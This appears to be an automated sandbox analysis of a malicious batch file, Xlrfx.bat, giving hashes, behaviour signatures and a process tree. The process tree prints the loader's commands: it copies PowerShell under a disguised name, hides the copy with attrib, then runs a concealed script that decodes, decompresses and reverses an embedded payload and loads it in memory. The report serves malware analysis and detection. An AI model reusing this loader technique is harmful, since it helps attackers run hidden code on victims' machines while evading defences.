Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
15-05-2024 10:56
Static task
static1
Behavioral task
behavioral1
Sample
Xlrfx.bat
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Xlrfx.bat
Resource
win10v2004-20240508-en
General
-
Target
Xlrfx.bat
-
Size
2.5MB
-
MD5
044b5f7f1996339fb95ab61afe9ce63b
-
SHA1
9b1ad4a81ae03ebb25d252eb12473dfe667af900
-
SHA256
c8b23374cfaebcceb230474be736c7d7c012c073a9c253bcf3dec1a26c920079
-
SHA512
77faaa93f02be4925d7238b63bc3651525f4438f70231173944aa71c1dc3429cbc9905cdaaf7eec454bd08f7e12b81424cf6db4021615e52a79635078817d948
-
SSDEEP
49152:Bio8vLA4esjKTI2VerQB+Mctxbqrhl8ManSazNv:o
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 1 IoCs
Processes:
Xlrfx.bat.Nsgpid Process 1496 Xlrfx.bat.Nsg -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Xlrfx.bat.Nsgpid Process 1496 Xlrfx.bat.Nsg -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Xlrfx.bat.Nsgpid Process 1496 Xlrfx.bat.Nsg -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Xlrfx.bat.Nsgdescription pid Process Token: SeDebugPrivilege 1496 Xlrfx.bat.Nsg -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 2224 wrote to memory of 2200 2224 cmd.exe 29 PID 2224 wrote to memory of 2200 2224 cmd.exe 29 PID 2224 wrote to memory of 2200 2224 cmd.exe 29 PID 2224 wrote to memory of 1716 2224 cmd.exe 30 PID 2224 wrote to memory of 1716 2224 cmd.exe 30 PID 2224 wrote to memory of 1716 2224 cmd.exe 30 PID 2224 wrote to memory of 2924 2224 cmd.exe 31 PID 2224 wrote to memory of 2924 2224 cmd.exe 31 PID 2224 wrote to memory of 2924 2224 cmd.exe 31 PID 2224 wrote to memory of 1496 2224 cmd.exe 32 PID 2224 wrote to memory of 1496 2224 cmd.exe 32 PID 2224 wrote to memory of 1496 2224 cmd.exe 32 PID 2224 wrote to memory of 1496 2224 cmd.exe 32 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:2200
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat.Nsg2⤵PID:1716
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat.Nsg2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2924
-
-
C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat.NsgC:\Users\Admin\AppData\Local\Temp\Xlrfx.bat.Nsg -WindowStyle hidden -command "$Eshusr = Get-Content 'C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat' | select-object -Last 1; $Yhyoxigy = [System.Convert]::FromBase64String($Eshusr);$Uneafks = New-Object System.IO.MemoryStream( , $Yhyoxigy );$Iaohomn = New-Object System.IO.MemoryStream;$Bydqksifw = New-Object System.IO.Compression.GzipStream $Uneafks, ([IO.Compression.CompressionMode]::Decompress);$Bydqksifw.CopyTo( $Iaohomn );$Bydqksifw.Close();$Uneafks.Close();[byte[]] $Yhyoxigy = $Iaohomn.ToArray();[Array]::Reverse($Yhyoxigy); $Pbdppxx = [System.Threading.Thread]::GetDomain().Load($Yhyoxigy); $Izgbjcqwat = $Pbdppxx.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f